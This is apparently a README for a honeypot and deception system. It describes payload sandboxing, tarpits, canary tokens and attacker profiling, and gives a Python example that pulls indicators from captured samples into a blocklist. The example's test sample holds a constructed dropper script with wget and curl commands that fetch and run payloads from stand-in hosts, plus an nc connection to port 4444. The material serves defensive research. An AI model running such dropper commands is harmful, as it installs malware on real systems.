Fettanego is not just a passive monitoring tool; it is an Active Deception Ecosystem designed to map adversary infrastructure, analyze attack patterns, and neutralize automated threats through resource exhaustion.
"The goal is not just to block the intruder, but to study them, consume their resources, and map their origins."
- Artifact Harvesting: Automatically captures, sandboxes, and analyzes payloads (ELF/SH/EXE) dropped by attackers to extract C2 (Command & Control) configurations.
- Adversary Profiling: Silent collection of attacker toolkits, "combo lists," and private wordlists used during the intrusion attempt for intelligence database generation.
- Active Deception (Psychological Layer): Traps attackers in a high-fidelity "fake" environment, presenting false assets (databases, keys) to waste their time and compute cycles.
- Infrastructure Mapping: Reverse-tracks the IP addresses and C2 nodes communicating with the captured malware samples.
Fettanego utilizes a modified, multi-layered deception engine powered by custom sensor nodes:
- Shell Emulation (SSH/Telnet): A highly interactive terminal that logs keystrokes and mimics vulnerable IoT devices or legacy servers.
- Application Sensors (Web/SQL): Emulates "juicy" targets like Log4j vulnerabilities, exposed SQL databases, and administrative panels to attract sophisticated bots.
- Tarpit Protocols: Intentionally delays network responses to keep attacker connections open indefinitely, causing Resource Exhaustion on the attacker's side.
- Payload Sandbox: Every downloaded file is isolated and statically analyzed. Extracted IPs/Domains are instantly fed into the blocklist.
- Canary Tokens & Decoys: The system plants "marked" files (fake AWS keys, database configs) within the filesystem. When an attacker exfiltrates and uses these, their true origin and location are revealed.
- Loop-Back Exploitation: If a cryptominer is detected, the system feeds it synthetic "fake work," consuming the attacker's bandwidth without generating actual hashes.
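The blocklist feed described under Payload Sandbox, as an added example (not Fettanego's own code): indicators pulled from a sample are validated before they are blocked, because a sample can embed private ranges or the operator's own addresses and an unfiltered feed would block those too. The allowlist entries, the file-suffix heuristic and the sample payload are assumptions constructed for illustration.

```python
import ipaddress
import re

STRINGS = re.compile(rb"[\x20-\x7e]{6,}")   # printable runs, like strings(1)
IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
DOMAIN = re.compile(r"(?<![\w.-])(?:[a-z0-9-]{1,63}\.)+[a-z]{2,24}(?![\w.-])", re.I)
# Production code would test ip.is_global; explicit nets are used here so the
# RFC 5737 documentation addresses in the constructed sample are not discarded.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3")]
# Assumed allowlist: the operator's own range and domains that must stay reachable.
ALLOW_NETS = [ipaddress.ip_network("198.51.100.0/24")]
ALLOW_DOMAINS = ("example.org",)
# Heuristic: drop names ending in common file extensions (costs recall on .sh/.so).
FILE_SUFFIXES = ("sh", "so", "bin", "elf", "exe", "txt", "log", "conf")


def extract_indicators(payload: bytes) -> dict:
    """Return {'block': [...], 'skipped': {indicator: reason}} for one sample."""
    text = "\n".join(m.group().decode("ascii") for m in STRINGS.finditer(payload))
    block, skipped = set(), {}
    for raw in IPV4.findall(text):
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:            # e.g. 999.1.1.1 matches the regex only
            skipped[raw] = "invalid"
            continue
        if any(ip in n for n in NON_ROUTABLE):
            skipped[raw] = "non-routable"
        elif any(ip in n for n in ALLOW_NETS):
            skipped[raw] = "allowlisted"
        else:
            block.add(str(ip))
    for raw in DOMAIN.findall(text):
        name = raw.lower()
        if name.rsplit(".", 1)[1] in FILE_SUFFIXES:
            continue                  # x.sh, a.elf: file names, not hosts
        if any(name == d or name.endswith("." + d) for d in ALLOW_DOMAINS):
            skipped[name] = "allowlisted"
        else:
            block.add(name)
    return {"block": sorted(block), "skipped": skipped}

# Constructed sample: a dropper script as a shell sensor might capture it.
SAMPLE = (b"#!/bin/sh\ncd /tmp; wget http://203.0.113.45/bins/x.sh; sh x.sh\n"
          b"curl -O http://c2.example.net/a.elf; nc 10.0.0.5 4444\n"
          b"ping -c1 198.51.100.7; ping updates.example.org; echo 999.1.1.1\n")
```

Logging the `skipped` reasons alongside the blocked entries shows when a sample is carrying addresses meant to make the sensor block itself or a dependency.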
[!] DISCLAIMER: This project is strictly for educational purposes, threat research, and defensive analysis. The author is not responsible for any misuse of the provided tools.